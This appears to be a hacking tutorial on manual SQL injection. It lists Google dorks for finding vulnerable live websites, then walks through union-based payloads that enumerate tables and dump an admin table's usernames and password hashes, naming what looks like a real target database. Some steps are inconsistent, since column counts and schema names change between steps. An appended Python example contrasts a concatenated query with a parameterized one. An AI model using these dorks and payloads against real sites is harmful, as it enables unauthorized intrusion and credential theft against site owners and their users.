Manual SQL Injection Attack

A SQL injection attack consists of the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutting down the DBMS), recover the content of a given file present on the DBMS file system and, in some cases, issue commands to the operating system. SQL injection attacks are a type of injection attack in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL commands.

First, find a site that is vulnerable to SQL injection:
To find a SQL-vulnerable website, we will use some of the following Google dorks:
inurl:index.php?id=  
inurl:trainers.php?id= 
inurl:buy.php?category= 
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid= 


Step 1: Finding a Vulnerable Link -

Add ' after id=3 in the URL.

If a SQL syntax error or a blank page is shown, the site is vulnerable to SQL injection.

Step 2: Finding the Number of Columns -

order by 8 --

If an error or a blank page is shown again, then the number of columns is 7.

Step 3: Finding the Vulnerable Column -

union all select 1,2,3,4,5,6,7 --

If the number 2 is shown on the page, then this column can give us the database, tables & columns.

Step 4: Finding the Database Name -

union all select 1,database(),3,4,5,6,7 --

The page shows the database name: chennaisilks

Step 5: Finding Table Names -

union all select 1,table_name,3,4,5,6 from information_schema.tables where table_schema='chennaisilks' --

Step 6: Finding Column Names -

union all select 1,column_name,3,4,5,6,7 from information_schema.columns where table_schema='blogtest' --


The admin table is admin.

The admin columns are:

admin_id
user_id
admin_pwd
admin_email
admin_last_login
admin_ip


Step 7: Finding the Admin Username & Password -


union all select 1,user_id,3,4,5,6,7 from admin --


union all select 1,admin_pwd,3,4,5,6,7 from admin --
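
Why the steps above produce errors and leaked rows, and what closes the hole, shown as an added example that is not part of the original page: the same request values are sent to a query built by string concatenation and to a parameterized one. Assumptions: in-memory SQLite stands in for the site's MySQL database, the `products` table, its rows and the function names are constructed for illustration, and the query has 3 columns instead of 7.

```python
import re
import sqlite3

def make_db():
    # Constructed sample data; in-memory SQLite stands in for the site's MySQL.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price TEXT);
        INSERT INTO products VALUES (3, 'sample item', '19.00');
        CREATE TABLE admin (user_id TEXT, admin_pwd TEXT);
        INSERT INTO admin VALUES ('constructed-user', 'constructed-hash');
    """)
    return db

def lookup_concatenated(db, raw_id):
    # Vulnerable pattern: the id= value becomes part of the SQL text.
    sql = "SELECT id, name, price FROM products WHERE id = " + raw_id
    try:
        return db.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return "SQL error: %s" % exc  # what surfaces as the error/blank page

def lookup_parameterized(db, raw_id):
    # Hardened: reject non-numeric ids, then bind the value as data.
    if not re.fullmatch(r"[0-9]{1,10}", raw_id):
        return []
    sql = "SELECT id, name, price FROM products WHERE id = ?"
    return db.execute(sql, (int(raw_id),)).fetchall()

# Request values taken from the steps above (3 columns here instead of 7).
PROBES = [
    "3",
    "3'",
    "3 order by 4 --",
    "3 union all select 1,user_id,admin_pwd from admin --",
]

if __name__ == "__main__":
    db = make_db()
    for probe in PROBES:
        print(repr(probe))
        print("  concatenated :", lookup_concatenated(db, probe))
        print("  parameterized:", lookup_parameterized(db, probe))
```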

